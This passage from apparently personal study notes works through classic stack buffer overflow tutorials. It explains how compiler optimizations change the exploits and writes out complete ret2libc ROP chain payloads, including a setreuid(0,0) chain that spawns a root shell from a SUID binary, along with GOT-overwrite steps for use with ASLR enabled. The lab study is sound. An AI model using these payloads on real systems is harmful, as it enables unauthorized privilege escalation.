<p>With <a href="./Smashing%20the%20stack%20-%20Aleph1/example3.c">example3.c</a>, the code also does not do what we expect, namely output <code>0</code> because we overwrote the return pointer of <code>function</code> in a way so that the <code>x = 1;</code> assignment is omitted. Here, the reason for this behavior is not inlining a function as we had previously but completely omitting a function.</p>
<p>When disassembling the corresponding executable, we can see that the function <code>function</code> simply is completely omitted from the compiler output. This is because of four reasons:</p>
<ol type="1">
<li>The function’s argument policy is “call-by-value” and not “call-by-reference”, i.e. the function just receives values from the caller but does not tamper with the caller’s memory by e.g. getting some pointers to manipulate.</li>
<li>The function has no return value (<code>void</code>) that would be saved in the caller’s function and reused.</li>
<li>The function does not access any global or otherwise somehow shared variables.</li>
<li>The function does not call any other functions which might influence the result / behavior (e.g. <code>printf</code>, <code>memset</code>, etc.).</li>
</ol>
<p>Because of those four reasons, the result of the compiler analysis is that this function does not have any functionality that influences the result (whereas it has: overwriting the return pointer). Thus, the compiler completely omits this function.</p>
<p>Therefore, the code is compiled in such a way that it simply outputs <code>1</code> via <code>printf</code> with a value <code>x = 1</code>.</p>
<h3 id="testsc.c-and-testsc2.c">testsc.c and testsc2.c</h3>
<p>The behavior of <a href="./Smashing%20the%20stack%20-%20Aleph1/testsc.c">testsc.c</a> and <a href="./Smashing%20the%20stack%20-%20Aleph1/testsc2.c">testsc2.c</a> is exactly the same when compiled with optimizations and is similar to the behavior of <code>example3</code> as described above.</p>
<p>GCC determines that the assignments (address of return address to <code>ret</code>, shellcode address to <code>*ret</code>) do not influence the further program flow (whereas they do, they overwrite the return pointer). Thus, they can be omitted according to the compiler. Because of this behavior, the compiler output for the corresponding optimized main functions is</p>
<div class="sourceCode" id="cb6"><pre class="sourceCode asm"><code class="sourceCode fasm"><a class="sourceLine" id="cb6-1" data-line-number="1">endbr32</a>
<a class="sourceLine" id="cb6-2" data-line-number="2"><span class="bu">ret</span></a></code></pre></div>
<p>instead of</p>
<div class="sourceCode" id="cb7"><pre class="sourceCode asm"><code class="sourceCode fasm"><a class="sourceLine" id="cb7-1" data-line-number="1">endbr32</a>
<a class="sourceLine" id="cb7-2" data-line-number="2"><span class="bu">push</span>   %<span class="kw">ebp</span></a>
<a class="sourceLine" id="cb7-3" data-line-number="3"><span class="bu">mov</span>    %<span class="kw">esp</span>,%<span class="kw">ebp</span></a>
<a class="sourceLine" id="cb7-4" data-line-number="4"><span class="bu">sub</span>    <span class="dv">$</span><span class="bn">0x4,</span>%<span class="kw">esp</span></a>
<a class="sourceLine" id="cb7-5" data-line-number="5"><span class="bu">call</span>   11a9 &lt;__x86.get_pc_thunk.<span class="kw">dx</span>&gt;</a>
<a class="sourceLine" id="cb7-6" data-line-number="6"><span class="bu">add</span>    <span class="dv">$</span><span class="bn">0x2e20,</span>%<span class="kw">edx</span></a>
<a class="sourceLine" id="cb7-7" data-line-number="7"><span class="bu">lea</span>    <span class="bn">-0x4</span>(%<span class="kw">ebp</span>),%<span class="kw">eax</span>     # <span class="bu">load</span> address of <span class="bu">ret</span></a>
<a class="sourceLine" id="cb7-8" data-line-number="8"><span class="bu">add</span>    <span class="dv">$</span><span class="bn">0x8,</span>%<span class="kw">eax</span>           # increment address by <span class="dv">8</span> bytes = <span class="dv">2</span> words (<span class="dv">32</span> bits each)</a>
<a class="sourceLine" id="cb7-9" data-line-number="9"><span class="bu">mov</span>    %<span class="kw">eax</span>,-<span class="bn">0x4</span>(%<span class="kw">ebp</span>)     # save new address of <span class="bu">ret</span> to <span class="bu">ret</span></a>
<a class="sourceLine" id="cb7-10" data-line-number="10"><span class="bu">mov</span>    <span class="bn">-0x4</span>(%<span class="kw">ebp</span>),%<span class="kw">eax</span>     # <span class="bu">load</span> <span class="bu">ret</span></a>
<a class="sourceLine" id="cb7-11" data-line-number="11"><span class="bu">lea</span>    <span class="bn">0x44</span>(%<span class="kw">edx</span>),%<span class="kw">edx</span>     # <span class="bu">load</span> address of shellcode</a>
<a class="sourceLine" id="cb7-12" data-line-number="12"><span class="bu">mov</span>    %<span class="kw">edx</span>,(%<span class="kw">eax</span>)         # save address of shellcode to <span class="bu">ret</span></a>
<a class="sourceLine" id="cb7-13" data-line-number="13"><span class="bu">nop</span></a>
<a class="sourceLine" id="cb7-14" data-line-number="14"><span class="bu">leave</span></a>
<a class="sourceLine" id="cb7-15" data-line-number="15"><span class="bu">ret</span></a></code></pre></div>
<p>(comments added for better readability).</p>
<p>The optimized <code>main</code> thus does only one thing: immediately return without any action.</p>
<p>Changing the main function from</p>
<div class="sourceCode" id="cb8"><pre class="sourceCode c"><code class="sourceCode c"><a class="sourceLine" id="cb8-1" data-line-number="1"><span class="dt">void</span> main() {</a>
<a class="sourceLine" id="cb8-2" data-line-number="2">    <span class="dt">int</span> *ret;</a>
<a class="sourceLine" id="cb8-3" data-line-number="3">    ret = (<span class="dt">int</span> *)&amp;ret + <span class="dv">2</span>;</a>
<a class="sourceLine" id="cb8-4" data-line-number="4">    (*ret) = (<span class="dt">int</span>)shellcode;</a>
<a class="sourceLine" id="cb8-5" data-line-number="5">}</a></code></pre></div>
<p>to</p>
<div class="sourceCode" id="cb9"><pre class="sourceCode c"><code class="sourceCode c"><a class="sourceLine" id="cb9-1" data-line-number="1"><span class="dt">void</span> main() {</a>
<a class="sourceLine" id="cb9-2" data-line-number="2">    <span class="dt">int</span> *ret;</a>
<a class="sourceLine" id="cb9-3" data-line-number="3">    ret = (<span class="dt">int</span> *)&amp;ret + <span class="dv">2</span>;</a>
<a class="sourceLine" id="cb9-4" data-line-number="4">    (*ret) = (<span class="dt">int</span>)shellcode;</a>
<a class="sourceLine" id="cb9-5" data-line-number="5">    printf(<span class="st">&quot;ret: %p</span><span class="sc">\n</span><span class="st">&quot;</span>, ret);</a>
<a class="sourceLine" id="cb9-6" data-line-number="6">}</a></code></pre></div>
<p>forces the compiler to include the calculations and assignments concerning <code>ret</code> in the compiler output, as <code>ret</code> is explicitely referenced in an output to the console.</p>
<h3 id="exploits">Exploits</h3>
<p>Concerning the exploits (<code>overflow1</code>, <code>exploit2</code>, <code>exploit3</code>, <code>exploit4</code>, <code>eggshell</code>), there is not a huge difference whether the code is optimized or not.</p>
<p>One change that is necessary is to explicitly return the stack pointer address from the <code>get_sp</code> functions instead of just copying it to the <code>eax</code> register and assuming that this register is used for the return value. Because of the optimizations, GCC may inline the <code>get_sp</code> function and not realize that the value in <code>eax</code> is important and just discard it. Thus, a change from</p>
<div class="sourceCode" id="cb10"><pre class="sourceCode c"><code class="sourceCode c"><a class="sourceLine" id="cb10-1" data-line-number="1"><span class="dt">unsigned</span> <span class="dt">long</span> get_sp(<span class="dt">void</span>) {</a>
<a class="sourceLine" id="cb10-2" data-line-number="2">    asm(<span class="st">&quot;movl %esp,%eax&quot;</span>);</a>
<a class="sourceLine" id="cb10-3" data-line-number="3">}</a></code></pre></div>
<p>to</p>
<div class="sourceCode" id="cb11"><pre class="sourceCode c"><code class="sourceCode c"><a class="sourceLine" id="cb11-1" data-line-number="1"><span class="dt">unsigned</span> <span class="dt">long</span> get_sp(<span class="dt">void</span>) {</a>
<a class="sourceLine" id="cb11-2" data-line-number="2">    <span class="dt">unsigned</span> <span class="dt">long</span> result;</a>
<a class="sourceLine" id="cb11-3" data-line-number="3">    asm(<span class="st">&quot;movl %%esp,%0&quot;</span></a>
<a class="sourceLine" id="cb11-4" data-line-number="4">        : <span class="st">&quot;=g&quot;</span>(result));</a>
<a class="sourceLine" id="cb11-5" data-line-number="5">    <span class="cf">return</span> result;</a>
<a class="sourceLine" id="cb11-6" data-line-number="6">}</a></code></pre></div>
<p>solves the problem by switching from <code>basic asm</code> notation to <code>extended asm</code> notation (see <a href="https://gcc.gnu.org/onlinedocs/gcc/Using-Assembly-Language-with-C.html">GCC documentation</a>), as the stack pointer address is now explicitely saved to a variable and returned. Both versions have exactly the same output for <code>get_sp</code> (if compiled with optimizations) but the latter one forces GCC to really use the returned value in <code>eax</code> and not discard it.</p>
<p>With this change made, the non-optimized exploits still work as described in the above sections. For the optimized exploits, it is sufficient to change the offsets for <code>exploit2</code> (<code>1676</code> instead of <code>1660</code>) and <code>exploit3</code> (<code>1600</code> instead of <code>350</code>), the other exploits (namely: <code>overflow1</code>, <code>exploit4</code>, <code>eggshell</code>) still work as expected.</p>
<h1 id="bit-linux-stack-smashing">64-bit Linux stack smashing</h1>
<p>This tutorial found on <a href="https://blog.techorganic.com" class="uri">https://blog.techorganic.com</a> is about exploiting stack buffer overflows on 64 bit machines and consists of three parts.</p>
<h2 id="part-1">Part 1</h2>
<p>In the <a href="https://blog.techorganic.com/2015/04/10/64-bit-linux-stack-smashing-tutorial-part-1/">first part</a>, a classical stack buffer overflow is conducted with all the protection mechanisms turned off (NX bit, canaries, ASLR). The attack is conducted by writing the shellcode to an environment variable, calculating the address of the environment variable on the stack and overwriting the return address of the function <code>vuln()</code> from <a href="./64bit%20Stack%20smashing%20-%20superkojiman/vulnerable.c">vulnerable.c</a>.</p>
<p>This is a pretty simple exploit, it does not even use tricks like NOP sleds in front of the shellcode. The whole exploit can be conducted by executing the <a href="./64bit%20Stack%20smashing%20-%20superkojiman/pwn_vulnerable.sh">pwn_vulnerable.sh</a> shellscript which does all the calculation and formatting.</p>
<h2 id="part-2">Part 2</h2>
<p>In the <a href="https://blog.techorganic.com/2015/04/21/64-bit-linux-stack-smashing-tutorial-part-2/">second part</a>, the stack is not used for executing shellcode (i.e. by placing the shellcode directly on the stack via the input or by placing it on the stack via environment variables.) Instead, a <code>ret2libc</code> attack is conducted.<br />
In this attack, the return address is overwritten such that the program jumps to libc and executes arbitrary code from there. As libc is included as a shared library, the code in there has to be executable. This way, we can work around the restriction that the NX bit might be set on the stack and our shellcode from the stack might not be executable.</p>
<p>The necessary steps are the following:</p>
<ol type="1">
<li>Find the address of the <code>system</code> function in libc via <code>gdb</code> (note: ASLR is still disabled, the address thus doesn’t change between executions)</li>
<li>Find a pointer to the string “/bin/sh” (easy, already included in the executable (see <a href="./64bit%20Stack%20smashing%20-%20superkojiman/vulnerable.c#L14">vulnerable.c</a>))</li>
<li>Find a gadget to load the pointer to this string into the register <code>rdi</code> before calling <code>system</code> (can be found in <code>__libc_csu_init</code>)</li>
<li>Combine the addresses and run it</li>
</ol>
<p>The code is then the following (<code>cat</code> is necessary for keeping the shell open):</p>
<div class="sourceCode" id="cb12"><pre class="sourceCode bash"><code class="sourceCode bash"><a class="sourceLine" id="cb12-1" data-line-number="1"><span class="kw">(</span><span class="ex">python3</span> -c <span class="st">&quot;from struct import pack; import sys; sys.stdout.buffer.write(</span></a>
<a class="sourceLine" id="cb12-2" data-line-number="2"><span class="st">    b'A' * 104 +                        # Padding to reach the return address</span></a>
<a class="sourceLine" id="cb12-3" data-line-number="3"><span class="st">    pack('&lt;Q', 0x0000555555555273) +    # Address of pop rdi; ret in function __libc_csu_init</span></a>
<a class="sourceLine" id="cb12-4" data-line-number="4"><span class="st">    pack('&lt;Q', 0x000055555555603f) +    # Address of &quot;</span>/bin/sh<span class="st">&quot; in function main</span></a>
<a class="sourceLine" id="cb12-5" data-line-number="5"><span class="st">    pack('&lt;Q', 0x00007ffff7e18410)      # Address of function system</span></a>
<a class="sourceLine" id="cb12-6" data-line-number="6"><span class="st">    )&quot;</span><span class="kw">;</span> <span class="fu">cat</span><span class="kw">)</span> <span class="kw">|</span> <span class="ex">./vulnerable</span></a></code></pre></div>
<p>Unfortunately, this only yields a segmentation fault. After investigating by debugging, it can be found that the segfault occurs during the <code>movaps xmmword ptr [rsp + 0x50], xmm0</code> instruction in <code>do_system</code>. The segfault occurs because the stack pointer (here included by <code>rsp</code>) is not properly aligned. <code>movaps</code> requires the memory address to be aligned on 16 bytes (see <a href="https://www.intel.com/content/dam/www/public/us/en/documents/manuals/64-ia-32-architectures-software-developer-instruction-set-reference-manual-325383.pdf#page=701">Intel instruction set reference</a>). When the segfault occurs, the <code>rsp</code> register contains the value <code>0x7fffffffdeb8</code>, which obviously is not aligned to 16 bytes (last hex digit has to be <code>0</code>). By extending our data to be copied onto the stack by 8 bytes, we can achieve proper alignment.<br />
As 64 bit addresses are exactly 8 bytes, the easiest way to achieve that is by adding an address to the stack that doesn’t change our execution. This could be the address of a <code>ret</code> instruction before our <code>pop rdi; ret</code> gadget. Such an instruction has no effect: when we return to this instruction, it immediately returns to the next instruction which is our exploit code.</p>
<p>Thus, a fixed version of the code is as follows:</p>
<div class="sourceCode" id="cb13"><pre class="sourceCode bash"><code class="sourceCode bash"><a class="sourceLine" id="cb13-1" data-line-number="1"><span class="kw">(</span><span class="ex">python3</span> -c <span class="st">&quot;from struct import pack; import sys; sys.stdout.buffer.write(</span></a>
<a class="sourceLine" id="cb13-2" data-line-number="2"><span class="st">    b'A' * 104 +                        # Padding to reach the return address</span></a>
<a class="sourceLine" id="cb13-3" data-line-number="3"><span class="st">    pack('&lt;Q', 0x00005555555551da) +    # Address of ret in function vuln</span></a>
<a class="sourceLine" id="cb13-4" data-line-number="4"><span class="st">    pack('&lt;Q', 0x0000555555555273) +    # Address of pop rdi; ret in function __libc_csu_init</span></a>
<a class="sourceLine" id="cb13-5" data-line-number="5"><span class="st">    pack('&lt;Q', 0x000055555555603f) +    # Address of &quot;</span>/bin/sh<span class="st">&quot; in function main</span></a>
<a class="sourceLine" id="cb13-6" data-line-number="6"><span class="st">    pack('&lt;Q', 0x00007ffff7e18410)      # Address of function system</span></a>
<a class="sourceLine" id="cb13-7" data-line-number="7"><span class="st">    )&quot;</span><span class="kw">;</span> <span class="fu">cat</span><span class="kw">)</span> <span class="kw">|</span> <span class="ex">./vulnerable</span></a></code></pre></div>
<p>If the SUID bit is set on the executable and it is owned by root, we can spawn a root shell with the following code:</p>
<div class="sourceCode" id="cb14"><pre class="sourceCode bash"><code class="sourceCode bash"><a class="sourceLine" id="cb14-1" data-line-number="1"><span class="kw">(</span><span class="ex">python3</span> -c <span class="st">&quot;from struct import pack; import sys; sys.stdout.buffer.write(</span></a>
<a class="sourceLine" id="cb14-2" data-line-number="2"><span class="st">    b'A' * 104 +                        # Padding to reach the return address</span></a>
<a class="sourceLine" id="cb14-3" data-line-number="3"><span class="st">    pack('&lt;Q', 0x00005555555551da) +    # Address of ret in function vuln</span></a>
<a class="sourceLine" id="cb14-4" data-line-number="4"><span class="st">    pack('&lt;Q', 0x0000555555555273) +    # Address of pop rdi; ret in function __libc_csu_init</span></a>
<a class="sourceLine" id="cb14-5" data-line-number="5"><span class="st">    pack('&lt;Q', 0x0000000000000000) +    # Value 0 =&gt; uid of root</span></a>
<a class="sourceLine" id="cb14-6" data-line-number="6"><span class="st">    pack('&lt;Q', 0x0000555555555271) +    # Address of pop rsi; pop r15; ret in function __libc_csu_init</span></a>
<a class="sourceLine" id="cb14-7" data-line-number="7"><span class="st">    pack('&lt;Q', 0x0000000000000000) +    # Value 0 =&gt; uid of root (into rsi)</span></a>
<a class="sourceLine" id="cb14-8" data-line-number="8"><span class="st">    pack('&lt;Q', 0x4141411411414141) +    # Junk (into r15)</span></a>
<a class="sourceLine" id="cb14-9" data-line-number="9"><span class="st">    pack('&lt;Q', 0x00007ffff7eda920) +    # Address of function setreuid</span></a>
<a class="sourceLine" id="cb14-10" data-line-number="10"><span class="st">    pack('&lt;Q', 0x0000555555555273) +    # Address of pop rdi; ret in function __libc_csu_init</span></a>
<a class="sourceLine" id="cb14-11" data-line-number="11"><span class="st">    pack('&lt;Q', 0x000055555555603f) +    # Address of &quot;</span>/bin/sh<span class="st">&quot; in function main</span></a>
<a class="sourceLine" id="cb14-12" data-line-number="12"><span class="st">    pack('&lt;Q', 0x00007ffff7e18410)      # Address of function system</span></a>
<a class="sourceLine" id="cb14-13" data-line-number="13"><span class="st">    )&quot;</span><span class="kw">;</span> <span class="fu">cat</span><span class="kw">)</span> <span class="kw">|</span> <span class="ex">./vulnerable</span></a></code></pre></div>
<p>This code additionally calls <code>setreuid(0, 0)</code> before spawning the shell.</p>
<p>Note: when working through this exercise, I could not just get the addresses from the executable but had to get the addresses from GDB. This is because the executable by default is compiled as PIE (Position Independent Executable). The addresses in the executable (e.g. showed by <code>objdump -d vulnerable</code>) are only offsets from the base address. The base address (<code>0x0000555555554000</code>) is always the same, because ASLR is disabled. When knowing this base address, one could just calculate all other addresses in the executable by adding the given offset to the base address.<br />
If compiled with the compiler flag <code>-fno-pic</code> and the linker flag <code>-no-pie</code>, the executable would contain the absolute addresses of the instructions instead of relative ones relative to the base address. This would make it probably easier to find the addresses (in the code snippet above: addresses for the <code>ret</code> instruction, <code>pop rdi; ret</code> and <code>/bin/sh</code>) because it would be sufficient to just look at the executable without loading it into a debugger. However, it would probably still be necessary to get the address of the <code>system</code> function by loading it into a debugger, as libc is only dynamically loaded on runtime and the address thus can only be determined by either knowing the offset of <code>system</code> in libc and at which base address libc will be loaded or by loading the executable into GDB and just printing the address with <code>p system</code>.</p>
<h2 id="part-3">Part 3</h2>
<p>For the <a href="https://blog.techorganic.com/2016/03/18/64-bit-linux-stack-smashing-tutorial-part-3/">third part</a> of the 64 bit stack smashing tutorial, ASLR is enabled (e.g. by the command <code>echo 2 | sudo tee /proc/sys/kernel/randomize_va_space</code>). Additionally, the Linux kernel by default disables <code>ptrace</code> functionality for security reasons. With this restriction, it is not possible to attach the debugger to an already running process. Thus, it is necessary to enable ptracing by issuing the command <code>echo 0 | sudo tee /proc/sys/kernel/yama/ptrace_scope</code> for debugging.</p>
<p>The exploit is based on the executable being available over the network (<code>socat TCP-LISTEN:2323,reuseaddr,fork EXEC:./vulnerable_advanced</code>) because we can then easily issue the distinct stages of the exploit. The exploit then consists of the following steps:</p>
<ol type="1">
<li>Leak <code>memset</code> address from the Global Offset Table (GOT)</li>
<li>Calculate the libc base address by the <code>memset</code> address and the known (fixed) offset of <code>memset</code> in libc</li>
<li>Calculate the address of <code>system</code> by the libc base address and the known (fixed) offset of <code>system</code> in libc</li>
<li>Overwrite the GOT entry of <code>memset</code> with the address of <code>system</code> =&gt; any further <code>memset</code> calls call <code>system</code> instead</li>
<li>Read the “/bin/sh” string into memory (as an argument to <code>system</code>)</li>
<li>Call <code>memset</code> again which in fact calls <code>system</code></li>
</ol>
<p>The following difficulties occured during those steps and the development of that exploit:</p>
<ol type="1">
<li>It is not possible to set a breakpoint in the vulnerable executable and attach GDB to the running process, as <code>socat</code> only executes the vulnerable executable on a new connection and the memory the breakpoint refers to thus is not loaded yet. This behavior leads to an error in GDB because it cannot access the memory at the specified location.<br />
This problem can be solved by setting a breakpoint, disabling the breakpoint, setting a catchpoint on execution of a new executable and continuing. GDB then automatically breaks when <code>socat</code> spawns the vulnerable executable. Then, it is sufficient to enable the breakpoint again and continue, as the corresponding address is now located in memory. The first automatic steps (until breaking at the catchpoint) can be achieved by the command <code>gdb-pwndbg -ex &quot;b BREAK&quot; -ex &quot;dis&quot; -ex &quot;catch exec&quot; -ex &quot;c&quot; -q -p $(pidof socat)</code>, where <code>BREAK</code> is the breakpoint (no matter whether using <code>gdb</code>, <code>gdb-pwndbg</code>, etc.).</li>
<li>The offset for <code>memset</code> in libc cannot be determined as it is the case in the tutorial. If the offset is determined like that, we only have the offset to the generic <code>memset</code> function. However, on modern Linux systems, the GNU IFUNC functionality dispatches dynamically to specialized functions depending on CPU features. On the current machine (VM as specified in <a href="#virtual-machine-setup">Virtual Machine setup</a> running on an Intel Core i5-6300HQ), the GOT entry of <code>memset</code> thus does not point to the generic <code>memset</code> in libc, but to <code>__memset_avx2_unaligned</code> in libc which makes use of the AVX2 instructions in modern Intel Core or AMD CPUs. Such ifuncs are not displayed when reading the symbols from libc and we thus cannot determine the offset easily just by calling <code>readelf -s /lib/x86_64-linux-gnu/libc.so.6 | grep memset</code>. Fortunately, there exists a <a href="https://github.com/ZetaTwo/ifunc-dumper">git repository</a> which provides the code to build the <code>ifunc-resolver</code> utility to get the offsets in libc of such specialized functions.<br />
With this offset, it is finally possible to determine the correct libc base address and thus the correct address of the <code>system</code> function.</li>
<li>Even with those issues resolved, we can observe in GDB that the exploit succeeds in that it calls <code>system</code> correctly. However, it does not spawn a shell and returns immediately.<br />
The error is not easy to find, as we’re jumping to <code>system</code> instead of calling it and GDB thus does not show the arguments. Also, stepping through the <code>system</code> call in GDB stops at a call to <code>posix_spawn</code> with the aforementioned error. The parameters to that call don’t reveal anything about the argument to the <code>system</code> call, which makes it difficult to spot the error.<br />
The solution is as follows: the address provided in the tutorial to write the “/bin/sh” string to is not writable in the environment used for creating the exploit. However, the <code>read</code> call reading from <code>stdin</code> and writing to that address does neither crash nor yield an error. With that behavior, we’re actually not calling <code>system(&quot;/bin/sh&quot;)</code> but <code>system(whatever is located at the non-writable address)</code>. Therefore, the <code>system</code> call fails, as it tries to execute whatever is located at that address as a shell command. By changing the presumably writable address to an actually writable address (here: location in the <code>.bss</code> section of the ELF executable), the exploit finally succeeds, as it can write the “/bin/sh” string to that location and pass it as an argument to <code>system</code>.</li>
</ol>
<p>The final exploit code crafted from the addresses found in the executable (compiled/linked as non-PIE) and the aforementioned approaches to find offsets and addresses is located in the <a href="./64bit%20Stack%20smashing%20-%20superkojiman/poc.py">poc.py</a> Python script. It relies on the executable being available over the network as mentioned above.</p>
<p>However, it is also possible to launch such an exploit locally. This was conducted using the Python <code>pwntools</code>. The <a href="./64bit%20Stack%20smashing%20-%20superkojiman/poc_local.py">poc_local.py</a> contains the code for a local exploit. In addition to the original exploit, this variant also calls <code>setreuid</code> in order to achieve privilege escalation when a vulnerable executable with the SUID bit set is exploited.</p>
<h2 id="optimizing-compilation-1">Optimizing compilation</h2>
<p>As with the executables from the <a href="#smashing-the-stack-for-fun-and-profit---aleph1">Aleph1 exploits</a>, no compiler optimizations were activated during the compilation of the executables used for the three parts of the tutorial. With optimizations enabled (<code>-O3</code> flag), the exploits have to be conducted a little bit different, which is explained in the following.</p>
<h3 id="part-1-1">Part 1</h3>
<p>The <a href="#part-1">first part</a> was just about overflowing a buffer and overwriting the return address with the address of an environment variable on the stack. The main difference here is that GCC tries to keep some variables only in registers if possible when optimization is enabled.</p>
<p>Here, the variable <code>int r</code> is affected by such an optimization.<br />
In the non-optimized version, 96 bytes on the stack are reserved for the buffer <code>buf</code> and the integer variable <code>r</code>. Those 96 bytes are divided into 80 bytes for the buffer and 16 bytes for the integer. <code>r</code> as a 32 bit integer should theoretically only need 4 bytes of memory on the stack. However, the stack by default is always aligned on 16 bytes on x86_64 / amd64 architectures which is why 96 bytes of stack memory are allocated.<br />
In the optimized version, only 80 bytes on the stack are reserved for the buffer <code>buf</code>. The integer variable <code>r</code> is never written on the stack. As a return value of the call to <code>read</code>, <code>r</code> is located in the register <code>rax</code> after that call. The value is then directly copied from <code>rax</code> to <code>rsi</code> which holds a parameter for <code>printf</code>. Thus, only 80 bytes of stack memory are necessary here.</p>
<p>This is the reason why the overflow with the <code>pwn_vulnerable.sh</code> script does not work: Initially, it overwrites 104 bytes with junk (80 bytes for <code>buf</code>, 16 bytes for <code>r</code> and padding, 8 bytes for the saved frame pointer) and then the return address with the address of the environment variable. With the optimized executable, it should only overwrite 88 bytes (80 bytes for <code>buf</code>, 8 bytes for the saved frame pointer) with junk. As it overwrites 104 bytes, it also overwrites the return address with junk which is why returning from the vulnerable function gives a segmentation fault.</p>
<p>This issue can easily be resolved with a small change to the exploit script by changing <a href="./64bit%20Stack%20smashing%20-%20superkojiman/pwn_vulnerable.sh#L14">line 14</a> from</p>
<div class="sourceCode" id="cb15"><pre class="sourceCode bash"><code class="sourceCode bash"><a class="sourceLine" id="cb15-1" data-line-number="1"><span class="ex">python3</span> -c <span class="st">&quot;from struct import pack; import sys; sys.stdout.buffer.write(b'A' * 104 + pack('&lt;Q', </span><span class="va">$addr</span><span class="st">))&quot;</span></a></code></pre></div>
<p>to</p>
<div class="sourceCode" id="cb16"><pre class="sourceCode bash"><code class="sourceCode bash"><a class="sourceLine" id="cb16-1" data-line-number="1"><span class="ex">python3</span> -c <span class="st">&quot;from struct import pack; import sys; sys.stdout.buffer.write(b'A' * 88 + pack('&lt;Q', </span><span class="va">$addr</span><span class="st">) * 3)&quot;</span></a></code></pre></div>
<p>Instead of providing 104 bytes of junk and an 8 byte address (= 112 bytes total), it then provides 88 bytes of junk and three times an 8 byte address (= 112 bytes total).<br />
For the non-optimized vulnerable executable, this doesn’t make a difference for the result. The only difference is that the last 8 bytes before the saved frame pointer and the saved frame pointer are overwritten with the address we want to return to instead of junk.<br />
For the optimized vulnerable executable, the return address is now written to the right position on the stack. The buffer and the saved frame pointer are completely overwritten with the junk in this case. In this case, parts of the previous stack frame are also overwritten (i.e. the lowest 16 bytes with twice the address). However, as we just want to return to the shellcode, this doesn’t make a difference for the result here.</p>
<h3 id="part-2-1">Part 2</h3>
<p>For part 2 of the tutorial, basically the same changes apply as for <a href="#part-1-1">part 1</a>. Instead of padding with 104 bytes of junk, we only need 88 bytes of padding if the executable is compiled with compiler optimizations.</p>
<p>In addition to that, we’re not overwriting the return address with a stack address that we determined before but with the address of an instruction in the same executable. Because of the compiler options being enabled, GCC may output the code at different offsets (position independent executables, PIE) or addresses (non-PIE). This is exactly what happens here: The address of the <code>ret</code> instruction in the <code>vuln</code> function changed. Luckily, all other addresses stayed the same despite the optimized code. This explicitely means that the addresses referring to <code>__libc_csu_init</code> and the <code>/bin/sh</code> string didn’t change. The addresses for the functions from libc (i.e. <code>system</code> and <code>setreuid</code>) didn’t change as libc is always loaded at the same base address, no matter whether the executable was compiled with compiler optimizations enabled or not.</p>
<p>Thus, it is sufficient to change the lines</p>
<div class="sourceCode" id="cb17"><pre class="sourceCode python"><code class="sourceCode python"><a class="sourceLine" id="cb17-1" data-line-number="1">    b<span class="st">'A'</span> <span class="op">*</span> <span class="dv">104</span> <span class="op">+</span>                        <span class="co"># Padding to reach the return address</span></a>
<a class="sourceLine" id="cb17-2" data-line-number="2">    pack(<span class="st">'&lt;Q'</span>, <span class="bn">0x00005555555551da</span>) <span class="op">+</span>    <span class="co"># Address of ret in function vuln</span></a></code></pre></div>
<p>to</p>
<div class="sourceCode" id="cb18"><pre class="sourceCode python"><code class="sourceCode python"><a class="sourceLine" id="cb18-1" data-line-number="1">    b<span class="st">'A'</span> <span class="op">*</span><span class="dv">88</span> <span class="op">+</span>                          <span class="co"># Padding to reach the return address</span></a>
<a class="sourceLine" id="cb18-2" data-line-number="2">    pack(<span class="st">'&lt;Q'</span>, <span class="bn">0x0000555555555204</span>) <span class="op">+</span>    <span class="co"># Address of ret in function vuln</span></a></code></pre></div>
<p>in the <a href="#part-2">original exploit codes</a>.</p>
<p>Giving just the exploit code including the <code>setreuid</code> call, this change results in the following code, working for the optimized executable:</p>
<div class="sourceCode" id="cb19"><pre class="sourceCode bash"><code class="sourceCode bash"><a class="sourceLine" id="cb19-1" data-line-number="1"><span class="kw">(</span><span class="ex">python3</span> -c <span class="st">&quot;from struct import pack; import sys; sys.stdout.buffer.write(</span></a>
<a class="sourceLine" id="cb19-2" data-line-number="2"><span class="st">    b'A' * 88 +                         # Padding to reach the return address</span></a>
<a class="sourceLine" id="cb19-3" data-line-number="3"><span class="st">    pack('&lt;Q', 0x0000555555555204) +    # Address of ret in function vuln</span></a>
<a class="sourceLine" id="cb19-4" data-line-number="4"><span class="st">    pack('&lt;Q', 0x0000555555555273) +    # Address of pop rdi; ret in function __libc_csu_init</span></a>
<a class="sourceLine" id="cb19-5" data-line-number="5"><span class="st">    pack('&lt;Q', 0x0000000000000000) +    # Value 0 =&gt; uid of root</span></a>
<a class="sourceLine" id="cb19-6" data-line-number="6"><span class="st">    pack('&lt;Q', 0x0000555555555271) +    # Address of pop rsi; pop r15; ret in function __libc_csu_init</span></a>
<a class="sourceLine" id="cb19-7" data-line-number="7"><span class="st">    pack('&lt;Q', 0x0000000000000000) +    # Value 0 =&gt; uid of root (into rsi)</span></a>
<a class="sourceLine" id="cb19-8" data-line-number="8"><span class="st">    pack('&lt;Q', 0x4141411411414141) +    # Junk (into r15)</span></a>
<a class="sourceLine" id="cb19-9" data-line-number="9"><span class="st">    pack('&lt;Q', 0x00007ffff7eda920) +    # Address of function setreuid</span></a>
<a class="sourceLine" id="cb19-10" data-line-number="10"><span class="st">    pack('&lt;Q', 0x0000555555555273) +    # Address of pop rdi; ret in function __libc_csu_init</span></a>
<a class="sourceLine" id="cb19-11" data-line-number="11"><span class="st">    pack('&lt;Q', 0x000055555555603f) +    # Address of &quot;</span>/bin/sh<span class="st">&quot; in function main</span></a>
<a class="sourceLine" id="cb19-12" data-line-number="12"><span class="st">    pack('&lt;Q', 0x00007ffff7e18410)      # Address of function system</span></a>
<a class="sourceLine" id="cb19-13" data-line-number="13"><span class="st">    )&quot;</span><span class="kw">;</span> <span class="fu">cat</span><span class="kw">)</span> <span class="kw">|</span> <span class="ex">./vulnerable</span></a></code></pre></div>
<p>For the non-optimized version, the original code has to be used. Thus, it is in that case not possible to create a single input that triggers the vulnerability in both the non-optimized and the optimized executable reliably.</p>
<h3 id="part-3-1">Part 3</h3>
<p>For part 3 of the tutorial, the changes are very similar to those conducted for <a href="#part-2-1">part 2</a> when compiling with optimizations enabled. Specifically, stack offsets are different and addresses changed. But in addition to that, we also have omissions that enforce some smaller changes to the exploit code.</p>
<p>Firstly, the padding with junk to fill the stack from the start of the buffer up to and including the saved frame pointer, we interestingly now need 184 bytes instead of 168. In the original version, 152 bytes (because of the alignment to whole quadwords for a 150 byte buffer) were used to overflow the buffer, 8 for the <code>ssize_t b</code> variable and another 8 bytes for the saved frame pointer. Now, the <code>ssize_t b</code> variable is not saved on the stack anymore but kept in registers thanks to compiler optimizations. Theoretically, the stack offset should thus shrink but in practice, the stack offset grows by 16 bytes which I can’t explain so far. Thus, we have to use a padding of 184 bytes insted of 168 bytes now.</p>
